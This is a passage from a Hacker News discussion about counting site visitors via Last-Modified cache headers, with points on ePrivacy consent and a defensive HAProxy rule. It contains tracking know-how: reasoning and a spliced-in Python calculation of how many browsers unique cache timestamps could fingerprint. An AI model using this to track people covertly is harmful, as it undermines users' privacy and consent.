wrote: | The only reason we could think of for wanting unique | visitors was for the marketing people or | investors/stakeholders/shareholders. Parsing the request | logs should be sufficient for every other metric. | | We had a bunch of meetings about this at what essentially | amounted to a giant information superhighway billboard | company. IIRC someone brought up using cache headers even | back then, because it didn't require cookies or | JavaScript, which we couldn't guarantee would be "up to | date". This was back in the "target IE6, still" days.
| | As one of my networking friends said, advertisers usually | know everything about your metrics, even if you don't. | You can't really fudge the numbers in your favor, so raw | requests or QPS or whatever ancillary metric would be | enough. | | The method in the article is defeated by clearing your | session when you're done browsing, or by using an | incognito/private browsing tab, as that should mark all | "cached" items for deletion. | [deleted] | Quarrelsome wrote: | I thought GDPR cared mostly about uniquely identifying visitors, | which this does not do. You still need a cookie banner to state | that you will put some data on their machine, but you always | need one of those. | jefftk wrote: | _> you always need one of those_ | | The withcabin.com landing page claims you don't need consent | banners to use it. | t0mas88 wrote: | That claim is false in Europe. You need to ask permission | for this approach, because you're storing something on the | user's device (the generated date in the cache) that isn't | strictly necessary. The ePrivacy Directive says you need | permission for that; nowhere does the law specify "cookies", | it's about any kind of data stored on the user's device. | jefftk wrote: | Uh, yes? That's exactly what I've been saying upthread. | mgrund wrote: | True, it does not matter if it's a cookie or whatever. | You need to look to Article 5(3) of the ePrivacy Directive | for which exemption case applies. In the case of | timestamps, it would be case A: | | > when the cookie is used "for the sole purpose of | carrying out the transmission of a communication over an | electronic communications network" ("Exemption A") | | Since the timestamp is no longer used solely for this | purpose, you need consent. | bvinc wrote: | What's to stop someone from sending unique last-modified dates to | uniquely fingerprint browsers?
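bvinc's question, and genewitch's back-of-the-envelope numbers earlier in the thread, come down to counting combinations: N cached resources, each carrying one of g distinguishable Last-Modified values, give g**N possible identifiers per day. A quick Python check of those figures, plus michaelt's "~30 bit" estimate for a single arbitrary date since the Unix epoch (the 2022-11-30 cutoff is an assumption matching the thread's date, and `id_space` is a hypothetical helper):

```python
import math
from datetime import datetime, timezone


def id_space(values_per_timestamp: int, timestamps: int) -> int:
    """Distinct combinations a server could hand out if each of `timestamps`
    cached resources gets one of `values_per_timestamp` Last-Modified values."""
    return values_per_timestamp ** timestamps


hourly_six_files = id_space(24, 6)       # hour-of-day on six resources
seconds_two_files = id_space(86_400, 2)  # second-of-day on two resources

# michaelt's single arbitrary date: any whole second from the Unix epoch
# up to the (assumed) date of the thread
epoch_seconds = int(datetime(2022, 11, 30, tzinfo=timezone.utc).timestamp())

print(f"{hourly_six_files:,}")             # 191,102,976
print(f"{seconds_two_files:,}")            # 7,464,960,000
print(round(math.log2(epoch_seconds), 1))  # 30.6
```

So the arithmetic holds: 24**6 is about 191 million, and two second-of-day timestamps give about 7.46 billion combinations, slightly below the roughly 8 billion people alive in late 2022. These are upper bounds that ignore the client-side countermeasures discussed in this thread (rejecting implausible dates, partitioned caches, dropped or rewritten headers).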
| nightpool wrote: | Because the cache key for the site is partitioned by top-level | origin in modern browsers, they wouldn't get any additional | information this way that they couldn't get with existing | first-party storage techniques, such as service worker caches, | session cookies, IndexedDB, etc. See e.g. | https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P... | Opening a new incognito window would trivially | defeat this method of "tracking". This is basically just a very | small first-party-only cookie. | SahAssar wrote: | Then why not use a cookie? The laws regarding tracking are | not actually about cookies, but about all cookie-like | tracking. What does this method gain? | nightpool wrote: | The ability to put "no cookies :)" in your marketing | materials. | [deleted] | 1vuio0pswjnm7 wrote: | What happens if the user disables JavaScript? | | The page lastmodified.normally.com claims "Works in any browser | or any server". What if the browser has no JavaScript engine? | | In this case I tried the demo with a browser that has a JS | engine, with JS enabled, and the demo still did not work. That is | because "ping.withcabin.com" was not disclosed to the user. The | OP suggests that users access "lastmodified.normally.com". It | says nothing about accessing "ping.withcabin.com". As such, the | proxy does not contain any address info for that domain. The user | (me) never typed it. | | Instead of a browser, I use a localhost-bound forward proxy to | control requests and responses, including HTTP headers. The proxy | contains all of the domain-to-IP address mappings I need in | memory. Why should I add an IP address for "ping.withcabin.com"? | The request returns no content. | | 1.
For example, something like this (HAProxy):
|
|   # hdr() reads *response* headers in http-response rules, so keep Host in a variable
|   http-request set-var(txn.host) req.hdr(host)
|   acl cabin var(txn.host) -m str ping.withcabin.com
|   http-request del-header If-Modified-Since if cabin
|   http-response del-header Cache-Control if cabin
|   http-response del-header Last-Modified if cabin
|
| bennyp101 wrote: | Seems a fairly benign way of counting how many people are | visiting your site. | | Not like it's tracking you across domains and services, more a | counter for how many people have visited, and either stayed and | looked around, or left. | meowface wrote: | >Not like it's tracking you across domains and services | | The same can be said of first-party cookies. ___________________________________________________________________ (page generated 2022-11-30 23:00 UTC)